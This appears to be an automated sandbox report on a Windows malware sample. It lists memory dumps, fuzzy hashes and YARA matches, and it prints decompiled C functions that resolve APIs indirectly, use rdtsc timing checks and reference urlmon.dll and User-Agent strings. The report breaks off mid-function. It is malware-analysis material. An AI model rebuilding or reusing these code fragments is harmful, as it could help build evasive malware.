                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                      • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                      • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                      • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E00409A80(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				char _v284;
                                                                                                                                                      				char _v804;
                                                                                                                                                      				char _v840;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				void* _t31;
                                                                                                                                                      				void* _t33;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      				void* _t39;
                                                                                                                                                      				void* _t52;
                                                                                                                                                      				intOrPtr _t54;
                                                                                                                                                      				void* _t55;
                                                                                                                                                      				void* _t56;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				void* _t58;
                                                                                                                                                      
                                                                                                                                                      				_t54 = _a4;
                                                                                                                                                      				_t39 = 0; // executed
                                                                                                                                                      				_t24 = E00407E80(__ecx, __edx, _t54,  &_v24); // executed
                                                                                                                                                      				_t56 = _t55 + 8;
                                                                                                                                                      				if(_t24 != 0) {
                                                                                                                                                      					E00408090( &_v24,  &_v840);
                                                                                                                                                      					_t57 = _t56 + 8;
                                                                                                                                                      					do {
                                                                                                                                                      						E0041B800( &_v284, 0x104);
                                                                                                                                                      						E0041BE70( &_v284,  &_v804);
                                                                                                                                                      						_t58 = _t57 + 0x10;
                                                                                                                                                      						_t52 = 0x4f;
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_t31 = E00414DB0(E00414D50(_t54, _t52),  &_v284);
                                                                                                                                                      							_t58 = _t58 + 0x10;
                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_t52 = _t52 + 1;
                                                                                                                                                      							if(_t52 <= 0x62) {
                                                                                                                                                      								continue;
                                                                                                                                                      							} else {
                                                                                                                                                      							}
                                                                                                                                                      							goto L8;
                                                                                                                                                      						}
                                                                                                                                                      						_t9 = _t54 + 0x14; // 0xffffe055
                                                                                                                                                      						 *(_t54 + 0x474) =  *(_t54 + 0x474) ^  *_t9;
                                                                                                                                                      						_t39 = 1;
                                                                                                                                                      						L8:
                                                                                                                                                      						_t33 = E004080C0( &_v24,  &_v840);
                                                                                                                                                      						_t57 = _t58 + 8;
                                                                                                                                                      					} while (_t33 != 0 && _t39 == 0);
                                                                                                                                                      					_t34 = E00408140(_t54,  &_v24); // executed
                                                                                                                                                      					if(_t39 == 0) {
                                                                                                                                                      						asm("rdtsc");
                                                                                                                                                      						asm("rdtsc");
                                                                                                                                                      						_v8 = _t34 - 0 + _t34;
                                                                                                                                                      						 *((intOrPtr*)(_t54 + 0x55c)) =  *((intOrPtr*)(_t54 + 0x55c)) + 0xffffffba;
                                                                                                                                                      					}
                                                                                                                                                      					 *((intOrPtr*)(_t54 + 0x31)) =  *((intOrPtr*)(_t54 + 0x31)) + _t39;
                                                                                                                                                      					_t20 = _t54 + 0x31; // 0x5608758b
                                                                                                                                                      					 *((intOrPtr*)(_t54 + 0x32)) =  *((intOrPtr*)(_t54 + 0x32)) +  *_t20 + 1;
                                                                                                                                                      					return 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					return _t24;
                                                                                                                                                      				}
                                                                                                                                                      			}




















                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                                                                                                                      • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                                                                                                                                      • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                                                                                                                      • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
                                                                                                                                                      				void* _t10;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      
                                                                                                                                                      				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                      				_t4 =  &_a16; // 0x414c6f
                                                                                                                                                      				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
                                                                                                                                                      				return _t10;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID: oLA
                                                                                                                                                      • API String ID: 1279760036-3789366272
                                                                                                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                      • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                                                                                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                      • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 43%
                                                                                                                                                      			E004082F0(void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                      				char _v3;
                                                                                                                                                      				char _v67;
                                                                                                                                                      				char _v68;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      				intOrPtr* _t16;
                                                                                                                                                      				int _t17;
                                                                                                                                                      				long _t24;
                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                      				void* _t33;
                                                                                                                                                      
                                                                                                                                                      				_t33 = __eflags;
                                                                                                                                                      				_push(0x3f);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				 *((intOrPtr*)( &_v67 - 0x3a)) =  *((intOrPtr*)( &_v67 - 0x3a)) + __edx;
                                                                                                                                                      				asm("rol byte [eax], 0xe8");
                                                                                                                                                      				 *(__edx + 3) =  *(__edx + 3) >> 0x51;
                                                                                                                                                      				E0041C3F0();
                                                                                                                                                      				_t15 = E0040ACC0(_t33, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                      				_t16 = E00414E10(_a4 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
                                                                                                                                                      				_t28 = _t16;
                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                      					_t24 = _a8;
                                                                                                                                                      					_t17 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
                                                                                                                                                      					_t35 = _t17;
                                                                                                                                                      					if(_t17 == 0) {
                                                                                                                                                      						_t17 =  *_t28(_t24, 0x8003,  &_v3 + (E0040A450(_t35, 1, 8) & 0x000000ff) - 0x40, _t17);
                                                                                                                                                      					}
                                                                                                                                                      					return _t17;
                                                                                                                                                      				}
                                                                                                                                                      				return _t16;
                                                                                                                                                      			}













                                                                                                                                                      APIs
                                                                                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                      • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                                                                                                                                      • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                                                                                                                                      • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                                                                                                                                      • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 42%
                                                                                                                                                      			E004082B4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				int _t21;
                                                                                                                                                      				long _t33;
                                                                                                                                                      				int _t38;
                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				void* _t43;
                                                                                                                                                      
                                                                                                                                                      				asm("lahf");
                                                                                                                                                      				if(__eflags > 0) {
                                                                                                                                                      					 *((intOrPtr*)(__eax - 0x3a)) =  *((intOrPtr*)(__eax - 0x3a)) + __edx;
                                                                                                                                                      					_t43 = _t42 + 1;
                                                                                                                                                      					asm("rol byte [eax], 0xe8");
                                                                                                                                                      					 *(__edx + 3) =  *(__edx + 3) >> 0x51;
                                                                                                                                                      					E0041C3F0();
                                                                                                                                                      					_t20 = E0040ACC0(__eflags,  *((intOrPtr*)(_t43 + 8)) + 0x1c, _t43 - 0x40); // executed
                                                                                                                                                      					_t21 = E00414E10( *((intOrPtr*)(_t43 + 8)) + 0x1c, _t20, 0, 0, 0xc4e7b6d6);
                                                                                                                                                      					_t38 = _t21;
                                                                                                                                                      					__eflags = _t38;
                                                                                                                                                      					if(_t38 != 0) {
                                                                                                                                                      						_t33 =  *(_t43 + 0xc);
                                                                                                                                                      						_t21 = PostThreadMessageW(_t33, 0x111, 0, 0); // executed
                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							_t21 =  *_t38(_t33, 0x8003, _t43 + (E0040A450(__eflags, 1, 8) & 0x000000ff) - 0x40, _t21);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _t21;
                                                                                                                                                      				} else {
                                                                                                                                                      					_push(0x11c6f95e);
                                                                                                                                                      					asm("adc eax, ebp");
                                                                                                                                                      					asm("lds ebp, [edi]");
                                                                                                                                                      					 *__eax =  *__eax + __eax;
                                                                                                                                                      					_t40 = __eax;
                                                                                                                                                      					return E0041B140(__ecx) + _t40 + 0x1000;
                                                                                                                                                      				}
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                      • Opcode ID: 2b3adb0071994df51cd41f5f42042d8539a45084a110832d02e8ac1b0969323b
                                                                                                                                                      • Instruction ID: d48ca81efc16e9748d7ccb43bdd4a35d2d56e06922ad4484a4080720d69b134b
                                                                                                                                                      • Opcode Fuzzy Hash: 2b3adb0071994df51cd41f5f42042d8539a45084a110832d02e8ac1b0969323b
                                                                                                                                                      • Instruction Fuzzy Hash: 72014C317407543AE71166685D43FFF7B14AF81B14F0982AEFE44BE1C3C6E9180642E9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                      			E0041A052(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                      				char _t12;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      
                                                                                                                                                      				asm("rcl ecx, cl");
                                                                                                                                                      				asm("rep insb");
                                                                                                                                                      				asm("rol ebx, cl");
                                                                                                                                                      				_t9 = _a4;
                                                                                                                                                      				_t3 = _t9 + 0xc74; // 0xc74
                                                                                                                                                      				E0041A950(_t18, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                      				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                      				return _t12;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                      • Opcode ID: e6818b2e1f97fe3368e3b8431b8da1fa1ea91d2864a2d3779e11874247444e65
                                                                                                                                                      • Instruction ID: 2c97211f60695eaf0afd548d493c0fa8256eb5ca2da6a4da6b64e692b9e06fa3
                                                                                                                                                      • Opcode Fuzzy Hash: e6818b2e1f97fe3368e3b8431b8da1fa1ea91d2864a2d3779e11874247444e65
                                                                                                                                                      • Instruction Fuzzy Hash: 2FE068B80003454FDB04EE38C4D24673B84EF802207008A8FEC5943202C124C81987A1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                      				char _t10;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      
                                                                                                                                                      				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                                                      				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                      				return _t10;
                                                                                                                                                      			}





                                                                                                                                                      0x0041a06f
                                                                                                                                                      0x0041a077
                                                                                                                                                      0x0041a08d
                                                                                                                                                      0x0041a091

                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                      • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                                                                                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                      • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                      				int _t10;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      
                                                                                                                                                      				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                      				return _t10;
                                                                                                                                                      			}





                                                                                                                                                      0x0041a1da
                                                                                                                                                      0x0041a1f0
                                                                                                                                                      0x0041a1f4

                                                                                                                                                      APIs
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                      • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                                                                                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                      • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E0041A095(intOrPtr _a4, int _a8) {
                                                                                                                                                      				void* _t13;
                                                                                                                                                      
                                                                                                                                                      				asm("invalid");
                                                                                                                                                      				_t7 = _a4;
                                                                                                                                                      				E0041A950(_t13, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
                                                                                                                                                      				ExitProcess(_a8);
                                                                                                                                                      			}




                                                                                                                                                      0x0041a09d
                                                                                                                                                      0x0041a0a3
                                                                                                                                                      0x0041a0ba
                                                                                                                                                      0x0041a0c8

                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0041A0A0(intOrPtr _a4, int _a8) {
                                                                                                                                                      				void* _t10;
                                                                                                                                                      
                                                                                                                                                      				_t5 = _a4;
                                                                                                                                                      				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                                      				ExitProcess(_a8);
                                                                                                                                                      			}




                                                                                                                                                      0x0041a0a3
                                                                                                                                                      0x0041a0ba
                                                                                                                                                      0x0041a0c8

                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Us$: $er-A$gent$urlmon.dll
                                                                                                                                                      • API String ID: 0-1367105278
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                      			E00938788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				short* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				signed int _v32;
                                                                                                                                                      				char _v36;
                                                                                                                                                      				signed int _v40;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				signed int _v48;
                                                                                                                                                      				signed int _v52;
                                                                                                                                                      				signed int _v56;
                                                                                                                                                      				signed int _v60;
                                                                                                                                                      				char _v68;
                                                                                                                                                      				void* _t216;
                                                                                                                                                      				intOrPtr _t231;
                                                                                                                                                      				short* _t235;
                                                                                                                                                      				intOrPtr _t257;
                                                                                                                                                      				short* _t261;
                                                                                                                                                      				intOrPtr _t284;
                                                                                                                                                      				intOrPtr _t288;
                                                                                                                                                      				void* _t314;
                                                                                                                                                      				signed int _t318;
                                                                                                                                                      				short* _t319;
                                                                                                                                                      				intOrPtr _t321;
                                                                                                                                                      				void* _t328;
                                                                                                                                                      				void* _t329;
                                                                                                                                                      				char* _t332;
                                                                                                                                                      				signed int _t333;
                                                                                                                                                      				signed int* _t334;
                                                                                                                                                      				void* _t335;
                                                                                                                                                      				void* _t338;
                                                                                                                                                      				void* _t339;
                                                                                                                                                      
                                                                                                                                                      				_t328 = __edx;
                                                                                                                                                      				_t322 = __ecx;
                                                                                                                                                      				_t318 = 0;
                                                                                                                                                      				_t334 = _a4;
                                                                                                                                                      				_v8 = 0;
